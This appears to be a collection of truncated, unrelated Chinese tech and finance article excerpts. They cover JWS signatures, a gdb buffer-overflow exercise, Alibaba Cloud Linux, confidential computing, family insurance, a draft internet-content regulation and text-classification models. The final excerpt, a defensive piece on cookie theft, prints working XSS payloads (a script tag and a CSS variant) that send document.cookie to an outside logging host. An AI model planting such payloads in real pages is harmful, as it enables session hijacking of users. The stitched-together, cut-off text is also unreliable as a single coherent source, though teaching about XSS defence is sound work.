参考文档 rfc7515 JWS 也就是 Json Web Signature，是构造 JWT 的基础结构（JWT 其实涵盖了 JWS 和 JWE 两类，其中 JWT 的载荷还可以是嵌套的 JWT），包括三部分 JOSE Header、JWS Payload、JWS Signature。 这里的 Signature 可以有两种生成方式，一种是标准的签名，使用非对称加密，因为私钥的保密性，能够确认签名的主体，同时能保护完整性；另一种是消息认证码 MAC（Message Authentication Code），使用对称秘钥，该秘钥需要在签发、验证的多个主体间共享，因此无法确认签发的主体，只能起到保护完整性的作用。 JWS 最终有两种序列化的表现形式，一种是 JWS Compact Serialization，为一串字符；另一种是 JWS JSON Serialization，是一个标准的 Json 对象，允许为同样的内容生成多个签名/消息认证码。 JWS Compact Serialization，各部分以 '.' 分隔。 BASE64URL(UTF8(JWS Protected Header)) || ’.’ ||BASE64URL(JWS Payload) || ’.’ ||BASE64URL(JWS Signature)JWS Json Serialization 还可以分为两种子格式：通用、扁平。 通用格式，最外层为 payload、signatures。signatures 中可以包含多个 json 对象，内层的 json 对象由 protected、header、signature 组成。不同的 protected header 生成不同的 Signature。 ...

1、相关知识gdb 汇编 2、例子 include <stdio.h>int main(int argc, char** argv) { int modified;char buffer[64];modified = 0;gets(buffer); // 引发缓冲区溢出if (modified != 0){ printf("Congratulations, you pwned it.\n");}else{ printf("Please try again.\n");}return 0;} 对该程序进行gdb调试gdb 程序名进入调试状态使用 disas main获取程序汇编代码 0x080482a0 <+0>: push %ebp 0x080482a1 <+1>: mov %esp,%ebp 0x080482a3 <+3>: and $0xfffffff0,%esp ; esp = esp - 0x60，即在栈上分配0x60）字节的空间 0x080482a6 <+6>: sub $0x60,%esp ; modified变量位于esp + 0x5C处，将其初始化为0 0x080482a9 <+9>: movl $0x0,0x5c(%esp) ; buffer位于esp + 0x1C处 ...

2019年9月26日星期四，在杭州云栖大会的阿里云系统软件开发者专场上，来自阿里云智能基础软件技术专家贾正华(花名：晓贾)做了主题为《Alibaba Cloud Linux 2-阿里云Linux操作系统》的技术分享，主要就Alibaba Cloud Linux 2(原Aliyun Linux 2)如何为云上客户提供一个优秀的的操作系统展开了全面的解析。 很多观众肯定会想知道为什么阿里云要做一个Linux操作系统，其实阿里巴巴从09年开始就在做操作系统相关的研究、开发工作，只是以前定制的操作系统主要是用在内部的一些应用上，而随着阿里巴巴技术的演进，我们觉得有必要将内部这么多年的经验和积累与客户一起分享，而且现在云上用户也对操作系统反馈了很多诉求，所以我们为阿里云和阿里云上的客户量身定制了Alibaba Cloud Linux 2。 在谈到云上用户对于操作系统的安全诉求时，贾正华谈到Alibaba Cloud Linux 2主要通过三个措施来保障操作系统安全： 通过Alibaba Cloud Linux 2 CIS benchmark(注1)可以帮助用户选择配置最适合自己的系统安全，包括但不限于系统初始化安全配置、系统服务安全配置、网络安全配置、日志监控安全配置等等，涵盖了整个系统安全配置的方方面面；通过对操作系统kernel、服务、配置等方面进行精细化的裁剪，大大降低了系统的受攻击面；最后得益于阿里巴巴安全技术团队为操作系统提供全方位的安全保障，包括：漏洞挖掘、全域CVE监测、环境模拟攻击等等措施保障系统安全。而且安全团队还可以从组织或者参与的安全社区从全社会获取安全情报，提前发现威胁、消除威胁；在性能方面，Alibaba Cloud Linux 2也做了非常多的工作，使启动时长下降了30%，运行时性能提升10%~30%： 在介绍Alibaba Cloud Linux 2为什么能够提升如此多的性能，贾正华谈到，启动时长得益于操作系统团队对OS的精细化裁剪和对内核启动阶段部分流程的代码优化，而运行时性能得益于我们选择了更优的4.19 LTS内核版本，并且结合阿里云基础设施对内核进行了多方面的优化，包括调度、内存、网络等。 在生态方面，Alibaba Cloud Linux 2为了让用户得到一个功能丰富全面、云上配置使用简单的OS，首先在保证全面兼容CentOS和多个upstream社区的同时，也天生搭载阿里巴巴技术例如Alibaba Cloud CLI、Alibaba Cloud OPENAPI，方便用户开箱即用，而且Alibaba Cloud Linux 2是一个完全开源(注2)、开放的系统，代码人人可见，人人可以用： 对于很多企业都关心的稳定性，Alibaba Cloud Linux 2依托于多个活跃稳定的强大社区base、阿里巴巴经济体海量应用的规模化验证、操作系统团队端到端的维护，极大的保证了线上操作系统的质量： 操作系统对于很多上层应用软件来说太底层了，甚至于应用可能完全没法感知的到，所以可能很多企业或者个人没法对其实施很多运维动作，肯定希望我们能够提供操作系统的服务，所以Alibaba Cloud Linux 2向用户提供包括但不限于问题支持、系统优化、特性订制等服务。 阿里云的用户可以通过阿里云工单系统来直接与我们联系，其他用户可以通过Alibaba Cloud Linux 2社区和钉钉来与我们联系。最重要的一点是操作系统团队所提供的服务都是“免费”的。 用户可以使用以下的方式与操作系统团队联系： Linux操作系统是一个非常庞大而复杂的系统，没有任何一个团体或者个人说我们已经能够完全掌控住他了，整个系统的持续演进不仅仅需要专业的团队进行维护，也希望有更多的企业、个人、社区一起参与共建。 注释：1、针对Alibaba Cloud Linux 2定制的CIS benchmark，详情参见：https://workbench.cisecurity.org/benchmarks/22282、Alibaba Cloud Linux 2代码完全开源，github地址：https://alibaba.github.io/cloud-kernel/zh/os.html ...

作者 | 闫守孟、肖俊贤、田洪亮 近日，Linux 基金会宣布全球多家巨头企业成立机密计算联盟（Confidential Computing Consortium），在对于数据安全和隐私担忧的不断增长下，基于可信执行环境技术的机密计算作为一种可行的解决方案，成为互联网巨头关注的焦点。蚂蚁金服很早就关注此类技术，并基于机密计算打造了蚂蚁金服新一代可信编程中间件 SOFAEnclave，为金融业务保驾护航。机密计算是蚂蚁安全计算的一环，也是金融级云原生的一块重要版图，蚂蚁金服表示：相信未来机密计算将和 HTTPS 一样，成为云计算的标配。引言互联网金融本质上是对大量敏感数据的处理以及由此沉淀的关键业务智能。近年来涌现出来的新业态更是将数据处理的范畴从单方数据扩展到了涉及合作方的多方数据。 另一方面，从 GDPR 到 HIPAA，数据隐私监管保护的范围愈加扩大，力度日益增强。可见，对金融数据和关键业务智能的安全保护，不仅是互联网金融业务的基础，也是其创新发展的依托，更是攸关合规的关键因素。 近年来迅速发展的机密计算技术是一种创新的数据隔离和加密处理技术，其重要特点是，TCB(trusted computing base 可信计算基) 中仅包含应用自身和基础硬件，即使 OS kernel、Hypervisor、甚至 BIOS 等特权软件都已经遭到破坏甚至本来就是恶意的，敏感数据和代码依然能安全无虞。 蚂蚁金服在自身的实践过程中，基于机密计算底层技术发展出金融级的机密计算中间件，确保金融应用数据和代码的机密性和完整性，为关键业务提供易用、安全、集群化的计算环境。 本文从机密计算的技术背景、关键问题、蚂蚁的技术突破、以及典型应用场景等方面展开。 机密计算的技术背景随着云计算的快速发展，越来越多的关键性服务和高价值数据被迁移到了云端。云安全也因此成为学术界和工业界关注的一个焦点。 近年来，云安全领域最重要的一项技术进展名为机密计算（Confidential Computing）。机密计算填补了当前云安全的一项空白——使用中数据（Data-in-use）的加密。过去通行的做法是对数据在存储中（比如硬盘）和传输中（比如网络）加密，而在使用中（比如内存）解密，以便处理。而机密计算可以保护使用中数据的机密性和完整性。 目前，多家云计算巨头都在不约而同地推广这项技术：微软已于 2017 年 7 月宣布开始接受 Azure 机密计算的早期试用申请；IBM 于 2017 年 12 月宣布 IBM 云数据保护（Cloud Data Guard）的预览版；谷歌也于 2018 年 5 月开源了名为 Asylo 的机密计算框架。 那么，机密计算究竟是如何实现的呢？ 实际上，上述所有云计算巨头在实现机密计算时都离不开一种称为“可信执行环境（TEE）”的技术。 顾名思义，TEE 提供一种与不可信环境隔离的安全计算环境，正是这种隔离和可信验证机制使得机密计算成为可能。 TEE 一般是直接基于硬件实现的，比如 Intel SGX，AMD SEV，ARM TrustZone，以及 RISC-V Keystone 等；基于虚拟化技术也可以构造 TEE，比如微软的 VSM，Intel 的 Trusty for iKGT & ACRN，但尚不能匹敌硬件 TEE 的安全性。 ...

前言文章转载自小帮规划的家庭保险配置公开课，为什么会考虑免费帮他们分享主要是内容干货比较多且不做任何具体的保险推荐，如果你觉得他们靠谱当然也可以选择付费咨询和购买相关保险，这是正常的商业模式。考虑到之前我也已经整理了香港和新加坡保险快速入门，本文作为保险系列专题的延续希望帮助大家进一步提升对保险的认知。 小白保险避坑课更新历史2019年09月18日 - 初稿 阅读原文 - https://wsgzao.github.io/post... 授权转载 小帮规划 原文关于家庭保险配置公开课：要不要买保险以及怎么买保险？ 欢迎大家来到小帮规划的家庭保险配置公开课，我是小帮规划的创始人兼 CEO 徐彬，先简单的自我介绍一下，我毕业于哈佛大学统计学系。毕业以后呢，在香港做了四年投资银行和两年对冲基金，主要服务于大中型企业和小部分有钱人，帮助他们管理风险和资产增值，我之前工作的地方属于传统金融机构，他们比较嫌贫爱富，所以在过去这类优质的金融服务是少数人的特权。 2015 年，我开始创业。我想用财商教育和金融科技，把那些曾经只属于有钱人的优质金融服务带给更多普通人，这期间我做了投资理财实践课，全网销售了大概 20 多万份，也创办了基金投资平台，带领了很大一批用户开始做科学的投资实践，在服务的过程中，我发现，很多用户虽然已经有了一定的经济实力和投资意识。但是在保障方面，因为没有专业的保险服务，很多人买的保险都是很不合理的，甚至有的用户完全没有给家庭做保障，这导致一场大病或者意外，就直接让他们的财富水平一夜回到解放前，也就是常说的一夜返贫。 保险是理财的第一步，但是保险里险种复杂，保险产品众多，同时呢，保险条款特别的生涩难懂，传统保险销售还经常夸大宣传。这就导致了买保险成了让很多人都很头疼的事情，针对买保险的过程中可能遇到的各种痛点，我们小邦推出了一对一保险顾问服务，希望我们的专业能带给更多小伙伴们科学合理的保险配置，让大家拥有一份稳稳的幸福生活，今天这节课我就给大家讲解一下如何科学的给家庭建立保障。 首先我们来了解一下保险的大分类，看上面的图，保险分为两大类，一类是保障性，另一类呢，是理财型，通常来说，保障性保险可以理解为是纯做保障的，分为四类，分别是重疾险，意外险，医疗险和寿险，那什么是理财型保险的，简单来说就是带身故赔付的理财产品，大家常听到的两全险，分红险，万能险等等都是理财型保险。 这里要给大家强调买保险的第一个原则，保障性保险和理财型保险要分开买，既想有保障，又想有理财收益，这种想法往往会让你掉到买保险最大的坑里去，为什么这么说呢，这类保险产品往往打着有病赔钱，没病返钱的旗号，如果发生了风险，比如说疾病意外身故，他可以赔钱，如果没发生这些风险，平平安安的，那么会把钱返还给大家，这听起来是不是特别好啊，就是抓住了大家的这种心理，很多保险业务员都特别喜欢卖这类返还性的保险。 其实返还性保险的原理特别简单，实际上大家交了两份儿钱，同时买了两份保险，一份是保障型，另一份是理财型，保障型的保险，为风险提供保障，而为理财性保险交的那部分钱，保险公司自己拿去投资了。投资收益的大头儿，保险公司自己拿了，分了一小部分给大家而已，所以在相同保障下，返还性保险比保障型要贵非常多，这不仅无形中会增大你的经济压力，而且会导致预算有限的情况下，你的保额大打折扣。 比如，对于一个 30 岁的女性来说，30 万保额的定期重疾险，如果买保障型的话，只需要 3000 元左右，买返还型的话呢，可能就需要一万元保费了，同样的钱，如果用来买保障性保险的话，一万元保费可以买到 100 万保额的终身重疾险了，保险姓保，保险的作用就应该是提供保障，买保险和理财千万不要混在一起，很多人既想有保障，又想要理财收益，但结果呢，往往是两项都没做好，大家弄懂了保障性保险和理财型保险的区别之后，下面我给大家仔细介绍一下保障性保险。 保障性保险中按作用又分为两大类，其中重疾险和医疗险侧重于保自己。这两种保险主要是保证自己有钱治病，有钱养病，寿险和意外险侧重于保家人。这两种保险用来确保自己不幸发生身故时家人的生活，不会受到太大影响，甚至完全没有经济来源。 我们每个人啊，不仅是独立的个体，而且可能是儿子，女儿，爸爸妈妈，丈夫和妻子。所以我们不仅要照顾好自己，保重，有病有灾的时候，有足够的钱去应对。而且呢，我们还应该想办法保证自己的不幸，不要对家人的生活产生太大影响，让家人在任何情况下都能拥有幸福的生活。所以保险是我们爱与责任的，必须选择。因此对于每个家庭而言，保险都是必不可少的，那接下来我给大家详细讲解一下四类保险的保障范围和作用。 首先，我们看一下医疗险，关于医疗险，大家最常问的问题是，医疗险和医保有啥区别呢，我有了医保，医保也能报销医疗费，那我还需要医疗险吗，对于这个问题，我们来看一下医保的报销范围就知道答案了。 我们一起来看一下上面的这张图啊，首先，医保报销会有起付线和封顶线。起付线之上，封顶线之下才能报销。并且就算再能报销的范围内也做不到 100% 全报销。其次，在治疗的过程中，医保范围外的药品是不能报销的，而大多数效果更好的进口药都不在医保范围内。所以呀，其实有了医保，我们还是需要医疗险去帮我们覆盖医保所不能覆盖的部分，现在市面上有很多不错的百万医疗险，只需要几百块钱就能做到，每年 100 万的保额，应该说是非常实惠的，所以我们建议你可以直接买百万医疗险。 讲完医疗险，接下来就是重疾险，重疾险可以说是保险的核心险种，我们在过往上课和给用户做方案的时候，经常会有用户有疑问，说我买了医疗险以后，生大病就能报销医疗费了，那是不是就可以不用买重疾险了呢，重疾险和医疗险是不是会重复呢，答案是完全不重复，重疾险更加重要。 医疗险都是短期的，通常都是一年期，每年都需要重新买，万一什么时候保险公司不卖类似的产品了，那下一年的保障就断档了，这就是所谓的停售风险。但重疾险通常都是长期的。虽然费用也是每年一缴，但是保障是长期的，一旦合同生效，即使产品下架了，也不影响合同履行。 其次是关于收入损失的补偿，医疗险是实报实销型，所以只能覆盖医疗费用。但是你想想重大疾病造成的经济损失，可不仅仅是医疗费用，重大疾病往往会造成长期不能工作，如果工作一年可以挣 20 万元，那每年的这 20 万元收入，他也是经济损失，这就叫收入损失，重疾险是只要符合条件就可以一次性赔付一笔钱，这笔钱用来干啥都行，可以用来支付医疗费用，后期的护理费用、也可以用来弥补收入损失，弥补收入损失恰恰是重疾险诞生的初衷。 我在 30 岁之前就给自己买了 100 万保额的重疾险，之所以这么做呢，是因为我觉得如果我不幸得了重大疾病，我爸妈肯定会不惜一切代价救我，你想想，如果没有重疾险，一家人不仅要承受精神上的痛苦，还要承担经济上的压力，相反，如果有了重疾险，一家人就可以没有后顾之忧的跟病魔做斗争了。 另外，再购买重疾险时有三点要特别注意，第一是否包含轻症赔付很重要，轻症就是重大疾病的早期阶段，随着医疗水平的进步，很多疾病都可以在早期阶段就被发现和治愈了，那为了能在早期阶段同样得到用来治病的钱，选择有轻症保障的重疾险是十分重要的。 第二，小心多次赔付的噱头。随着保险行业的不断发展，保险赔付也从一次赔付发展到了多次赔付，甚至同时多次重症加多次轻症赔付。通常来说，三次重症赔付加三次轻症赔付，对于大部分人来说就已经够用了，目前有些重疾险的赔付次数到了五次，甚至八次，那是完全没有必要的，只会把保费给拉高。你想一个人连得八次重大疾病，这得是多低的概率啊。 第三，保额充足最重要，我们给客户做保单体检的时候，发现很多人的重疾险保额都很低，重疾险保额 30 万是最基础的。根据目前的医疗水平和物价水平，额度，最好是 50 万起。我们买保险不是图心里安慰，而是想让保险真正的发挥作用，想要达到这个目标啊，保额充足是必须的。 聊完重疾险，我们再来看看意外险，如果不幸遭遇意外，严重的话，会造成身故或者伤残，即使没有那么严重，也需要花费医疗费用，那意外险就是针对这两种情况进行保障的，意外险非常的便宜，比如 50 万保额的意外险只需要 100 多块钱。所以意外险保额可以配置的高一些，由于意外险需要覆盖因残疾不能工作导致的收入损失。所以一般来说，意外险的保额起码要达到五年的年收入，如果五年的年收入还不足 50 万的话，你可以直接买 50 万保额的意外险。 ...

9月10日下午，国家互联网信息办公室发布了关于《网络生态治理规定(征求意见稿)》公开征求意见的通知。 网信办官网 通知指出，为了加强网络生态治理，维护良好网络秩序，保障公民、法人和其他组织的合法权益，构建天朗气清的网络空间，根据《中华人民共和国网络安全法》《互联网信息服务管理办法》《国务院关于授权国家互联网信息办公室负责互联网信息内容管理工作的通知》，国家互联网信息办公室会同有关部门起草了《网络生态治理规定（征求意见稿）》。 目前，公众可以通过以下途径和方式提出反馈意见： 1.登录中国政府法制信息网（网址：http://www.chinalaw.gov.cn），进入首页的“立法意见征集”提出意见。2.通过电子邮件方式发送至：shengtai@cac.gov.cn3.通过信函方式将意见寄至：北京市西城区车公庄大街11号国家互联网信息办公室网络综合协调管理和执法督查局，邮编100044，并在信封上注明“网络生态治理规定征求意见”。意见反馈截止时间为2019年10月10日。尽管当下的《网络生态治理规定（征求意见稿）》还不是正式稿，但有一些趋势还是可以提前看到。比如说《网络生态治理规定（征求意见稿）》里，已经明确要求网络信息平台应当建立网络生态治理机制，健全信息发布审核、跟帖评论审核、版（页）面生态管理、实时巡查、应急处置、网络谣言处置、网络黑产线索处置等制度。网络信息内容服务平台应当设立网络生态治理负责人，配备与服务规模相适应的工作人员，并加强教育培训。 从这来看，内容平台的主体责任再也不能逃避，必须切实履行起社会责任和道德责任，不能让互联网成为传播有害信息、造谣生事的平台。 该征求稿也明确了法律责任。网络信息内容服务平台违反本规定的，由网信等有关主管部门依据职责采取约谈、责令限期改正等管理措施。拒不改正或者情节严重的，依法给予警告、罚款、责令停业整顿直至吊销许可证；构成犯罪的，依法追究刑事责任。对严重违反本规定的网络信息内容服务平台、网络信息内容生产者和网络信息内容使用者，将会被依法依规实施限制从事网络信息服务、网上行为限制、行业禁入等惩戒措施。 附录：网络生态治理规定（征求意见稿） 网络生态治理规定 （征求意见稿） 第一章 总则 第一条 为了加强网络生态治理，维护良好网络秩序，保障公民、法人和其他组织的合法权益，构建天朗气清的网络空间，根据《中华人民共和国网络安全法》《互联网信息服务管理办法》《国务院关于授权国家互联网信息办公室负责互联网信息内容管理工作的通知》，制定本规定。 第二条 中华人民共和国境内的网络生态治理，适用本规定。法律、行政法规另有规定的，遵照其规定。 本规定所称网络生态治理，是指政府、企业、社会、网民等主体，以网络信息内容为主要治理对象，以营造文明健康的良好生态为目标，开展的弘扬正能量、处置违法和不良信息等相关活动。 第三条 国家网信部门负责统筹协调网络生态治理和相关监督管理工作。国家新闻出版部门和国务院教育、电信、公安、文化、市场监督管理、广播电视等有关主管部门依据各自职责做好网络生态治理工作。 地方各级网信部门依据职责负责统筹协调本行政区域内网络生态治理和相关监督管理工作。地方各级新闻出版部门和教育、电信、公安、文化、市场监督管理、广播电视等有关主管部门依据各自职责做好本行政区域内网络生态治理工作。 第二章 网络信息内容生产者 第四条 网络信息内容生产者应当遵守法律法规，遵循公序良俗，加强网络文明建设。 第五条 鼓励制作含有下列内容的信息： （一）宣传习近平新时代中国特色社会主义思想，全面准确生动解读中国特色社会主义道路、理论、制度、文化的； （二）宣传党的理论路线方针政策和中央重大决策部署的； （三）展示经济社会发展亮点，反映人民群众伟大奋斗和火热生活的； （四）弘扬社会主义核心价值观，宣传优秀道德文化和时代精神，充分展现中华民族昂扬向上精神风貌的； （五）有效回应社会关切，解疑释惑，析事明理，有助于引导群众形成共识的； （六）有助于提高中华文化国际影响力，向世界展现真实立体全面的中国； （七）其他含有讴歌真善美、促进团结稳定等积极内容的。 第六条 禁止制作含有下列内容的违法信息： （一）违反宪法所确定的基本原则的； （二）危害国家安全，泄露国家秘密，颠覆国家政权，破坏国家统一的； （三）损害国家荣誉和利益的； （四）歪曲、丑化、亵渎、否定英雄烈士及其事迹和精神的； （五）宣扬恐怖主义、极端主义，煽动民族仇恨、民族歧视，破坏民族团结的； （六）破坏国家宗教政策，宣扬邪教和封建迷信的； （七）散布虚假信息，扰乱经济秩序和社会秩序的； （八）散布淫秽、色情、赌博、暴力、凶杀、恐怖或者教唆犯罪的； （九）侮辱或者诽谤他人，侵害他人名誉、隐私和其他合法权益的； （十）含有法律、行政法规禁止的其他内容的。 第七条 不得制作含有下列内容的不良信息： （一）带有性暗示、性挑逗、性诱惑的； （二）展现血腥、惊悚等致人身心不适的； （三）宣扬炫富拜金、奢靡腐化等生活方式的； （四）过度炒作明星绯闻、娱乐八卦的； （五）使用粗俗语言、展示恶俗行为、宣扬低俗内容的； （六）调侃恶搞自然灾害、重大事故等灾难的； （七）煽动人群歧视、地域歧视等的； （八）使用夸张标题，内容与标题严重不符的； （九）对未成年人身心健康造成不良影响的； （十）其他含有危害社会公德等破坏网络生态内容的。 第三章 网络信息内容服务平台 第八条 网络信息内容服务平台应当切实履行网络生态治理主体责任，加强本平台生态治理工作，积极培育向上向善的网络文化。 第九条 网络信息内容服务平台应当建立网络生态治理机制，健全信息发布审核、跟帖评论审核、版（页）面生态管理、实时巡查、应急处置、网络谣言处置、网络黑产线索处置等制度。网络信息内容服务平台应当设立网络生态治理负责人，配备与服务规模相适应的工作人员，并加强教育培训。 第十条 网络信息内容服务平台应当加强对其用户发布信息的管理，发现法律、行政法规禁止发布或者传输的信息的，应当立即停止传输该信息，采取消除等处置措施，防止信息扩散，保存有关记录，并向有关主管部门报告。 网络信息内容服务平台对网信部门和有关部门依法实施的监督检查，应当予以配合。 ...

本文来自：易盾实验室 在深度学习技术兴起之前相当长的一段时间内，基于机器学习技术的文本分类方法占据着文本分类领域的统治地位。 如下图所示，特征工程+机器学习分类器一直是解决文本分类问题的标准范式。针对不同的业务场景，算法工程师需要精心设计相应的特征工程，以取得最佳的分类效果。][2] 到2010年，深度学习技术逐渐兴起，文本分类领域的技术格局也相应的发生了变化。基于深度学习的文本分类方法打破了上述技术范式，对文本进行简单预处理后，直接喂给深度学习模型，进行端到端的训练和推断。一般性的，用于文本分类的深度学习模型最后一层为softmax层（多标签问题则为sigmoid），这相当于机器学习分类器中的LR模型。由此可见，模型的其余部分本质上就是在自动学习文本的特征表示，因此算法工程师再也不用操心特征工程的事情了。不过先别高兴得太早，文本特征学得好不好，取决于具体的深度学习模型结构设计和超参数设置，工程师们还是得把省下来的时间花在模型结构和超参数的调整上面。 本文根据易盾文本算法团队在内容安全领域的实践经验，介绍在项目中用过的一些深度学习模型以及对部分技术细节进行讨论。深度学习是近几年来的热门方向，学术界和工业界的研究人员提出了很多有价值的方法，本文所分享的方法只是其中少数代表性的工作，仅供读者参考。 CNN 使用CNN来做文本分类最早见于2014年Convolutional Neural Networks for Sentence Classification”这篇文章当中。CNN模型现在已经是做文本分类的经典模型，综合考虑模型效果、计算开销、计算并行化等因素，CNN模型往往具备不错的竞争力。有学者表示，CNN模型之所以能够获得较好的分类效果，与卷积核的使用有关。不同size的卷积核，对文本在不同位置进行卷积计算，相当于提取不同的n-gram特征，这有助于模型的最终分类。 上图是一个典型的单层CNN模型结构。首先将文本转化成词向量矩阵，然后分别使用不同size的的卷积核对矩阵进行卷积，每组卷积输出多个feature map，然后进行max pooling后，把所有feature map拼接在一起，形成单个向量表示，最后加上一层全连接和softmax操作，输出分类分数。 图中只是一个示例，各类超参数都比较小，在实际使用过程中，词向量大小50以上，卷积核的size一般取2~7，每个卷积的feature map数量在几十到几百。另外max pooling也可以换成其它的pooling方法，比如average pooling，不过总体来说还是max pooling比较适合分类场景。正常情况下，通过超参数的调优，单层CNN模型已经能够适用大多数文本分类场景。但也有人使用多层CNN模型的，我们的经验是参数数量差不多的前提下，多层CNN未发现有明显的效果提升。 RNN RNN模型主要用于处理序列数据，而文本天然的就是表示成若干词的序列，因此使用RNN模型来对文本进行建模是十分自然的事情。与全连接或卷积网络不同，RNN内部不同词对应的隐藏层相互之间是有联系的：当前词的隐藏层的输入除了输入层的输出，还包括前一个词的隐藏层的输出。 当序列长度较长时，基础的RNN模型存在梯度爆炸和梯度消失问题。LSTM和GRU是RNN的两种改良版本，它们通过门的机制对RNN中信息的传播进行控制，缓解了RNN的梯度消失问题（RNN梯度爆炸问题可以通过gradient clipping技术进行解决）。从图中可以看出，GRU与LSTM结构比较相似，主要不同之处在于GRU使用更新门来对LSTM的输入门和遗忘门进行简化。 由于RNN最后一个词的输出已经融合了前面词的信息，RNN用于文本分类时一般取最后一个词的输出作为整个文本的特征表示，即用最后的输出加上全连接和softmax计算分类分数。当然，一般我们会使用多层RNN的结构，用最后一个词的末层RNN的输出计算分类分数。 RNN的数据流动是单向的，只能从前往后或从后往前。Bi-RNN对此进行了改进，具体做法是使用前向RNN和后向RNN，把文本中最后一个词的前向RNN输出和第一个词的后向RNN输出拼接在一起，作为文本的特征表示。从我们的实践经验上看，Bi-RNN的这种改进效果提升很明显，我们知道attention对模型有较大的提升作用，但在某些业务场景里面attention对Bi-LSTM的提升比较有限，这说明Bi-LSTM自身的效果已经比较接近问题本身的理论上限。 RCNN RCNN也是早期深度学习技术应用于文本分类上面经常用到的模型之一。RCNN为每个词定义了left context和right context两个变量，具体计算方式如下： 最终每个词由自身的词向量和两个context拼接共同表示，然后先接一层全连接层，再作max pooling形成单个的向量。这个模型为什么叫RCNN（Recurrent Convolutional Neural Networks）呢？首先，从left context和right context的定义可以看出这部分其实就是一个双向的RNN，只不过最后还拼接上原始的词向量。另外，这里并没有只取最后一个词的输出计算分类分数，而是对每个词的输出进行全连接再作max pooling。其实，这里的全连接等价于进行size为[1，emb_size]和strip为1的二维卷积操作，后面再跟着max pooling，这就是典型的CNN结构。 Attention Attention机制被广泛使用在自然语言处理、图像识别及语音识别等各种不同类型的深度学习任务中，是深度学习技术中最值得关注与深入了解的核心技术之一。Attention机制可以理解成给定Q，从一系列K-V键值对中计算出各个V的权重，然后再对V进行加权平均。具体公式如下： 其中f函数对Q和K进行打分，可以有不同的实现方式，常见的有点积、缩放点积、加性、双线性等方法，我们也可以自己实现其它的计算方法。 我们注意到上述attention的计算涉及到Q、K、V三个输入，当Q=K时，这样的attention技术被称为self-attention。实际上，self-attention是目前用得最多的attention技术，它不需要额外的数据，只根据文本自身的上下文，就能计算文本中各个词的重要性。可以看出，attention本质上就是算各个词的权重，然后进行加权平均。而我们知道在word2vec问世以后，在怎么把多个词的词向量变成单个向量来表示句子的问题上，有一种做法就是加权平均，比如根据tf-idf加权平均。那么attention和这种加权平均的区别是什么？最本质的不同就是同一个词，普通的加权平均方法权重是固定不变的（最多乘以词频系数），attention方法的权重是根据上下文动态计算的，在不同的文本和不同的位置，它的权重都是不一样的。这就像人类的视觉注意力，看到不同的图像时重点关注的区域不一样，所以我们把这个技术叫做attention。同一个词在不同的上下文中得到不同的输出，这种特性使得attention方法天然的般配NLP中的一词多义问题。 具体到文本分类模型，attention的使用比较灵活，既可以单独使用attention进行分类，也可以和CNN、RNN等模型结合。目前常见的模型有transformer、HAN、RNN+attention、CNN+attention、Bi-RNN+attention等等，这里不再展开赘述。 FastText FastText是Facebook在2016年开源的一个轻量级文本表示和文本分类工具。它的特点是在具有媲美当时复杂深度神经网络模型文本分类准确率的同时，训练和预测非常高效，CNN训练1天的数据，FastText只要几秒即可。 FastText之所以这么高效，主要有三个原因。第一，模型结构特别简单，对文本所有单词的embedding求平均然后加上softmax分类器。第二，这个softmax分类器是一个层次softmax分类器，这个在分类类别很多的时候比较有用。第三，FastText使用C++实现的，并且作者代码能力也非常强，因此虽然有很多复现版本，但都没有原版高效。 尽管模型结构简单，FastText使用了n-gram和subword两种技术，帮助提升了文本分类效果。n-gram有助于模型捕捉文本局部的单词顺序，而大部分文本分类任务并不需要太长的依赖关系。subword也叫char n-gram，就是把单词分解更小的子串片段，这能更好的对未登录词和稀有词进行建模，同时学习到相同词缀单词语义关系。 总的来说，FastText适用于对精确度要求不高同时需要较高实时性的文本分类场景，也可以作为新算法的一个baseline。 Bert BERT是谷歌在2018年发布的一个预训练语言模型，它刷新了11个NLP任务的记录。BERT的发布使得NLP领域真正进入到了基于通用预训练模型进行下游任务的时代，同时也进入了大力出奇迹的时代——通过更多的数据、更大的模型获得更高的准确率，从此以后各家科技巨头推出的模型越来越大，训练用的数据也越来越多，简直就是在炫富。其实在BERT之前也有很多预训练语言模型的研究，像ELMo、GPT都是当时比较突出的成果，它们的很多思路和方法都被BERT借鉴了。 相比前辈们，BERT之所以引起这么大的关注，主要在于它的效果确实很惊艳，同时在多个NLP任务上面刷新记录，并且提升幅度都还挺大的。更重要的是，BERT用在这些任务上面并不需要精心设计下游网络，基本上都是接一个简单的预测结构，然后简单地fine-tuning一下就OK了。 BERT模型结构本身并不复杂，主要分为3个部分：最底层是embedding组件，包括词、位置和token types三种embedding的组合；中间层是由多个Transformer encoder组成的深度网络（base版本是12层，large版本是24层）；上层是与训练任务相关的组件，主要就是softmax网络。BERT模型比较重要的创新有两方面，分别是Masked LM和Next Sentence Prediction（NSP）。Masked LM用[MASK]替换句子中的部分单词，模型的目标是预测[MASK]位置上的真实单词。 ...

窃取网页浏览中的cookie值下面的的 JavaScript 代码就可以窃取Cookie，是不是很简单？ <script> new Image().src = "http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);</script>如果我可以将这段代码插入到某个登陆用户的页面，则Cookie就会通过 HTTP 请求发送给我，然后我就可以伪造那个可怜的登陆用户了！ 在 IE 浏览器上，可以通过在 CSS 代码中执行 JavaScript 来窃取Cookie，也很简单。 <style>.getcookies{ background-image:url('javascript:new Image().src="http://jehiah.com/_sandbox/log.cgi?c=" + encodeURI(document.cookie);');}</style><p class="getcookies"></p>如果你对用户发布的文本内容不进行严格的过滤的话，黑客就可以很方便地窃取Cookie。是不是很可怕？如果你是一个负责任的开发者的话，你就应该保持警惕！因此，你必须假设所有用户的Cookie都被窃取了。注意，是所有用户，对于这一点，我不想含糊其辞。 为了保证安全：请不停地重设session的重设；将过期时间设置短一些；监控referrer与userAgent的值；使用HttpOnly禁止脚本读取Cookie。这些措施并非万无一失，但是增加了黑客的难度，因此也是有效的。

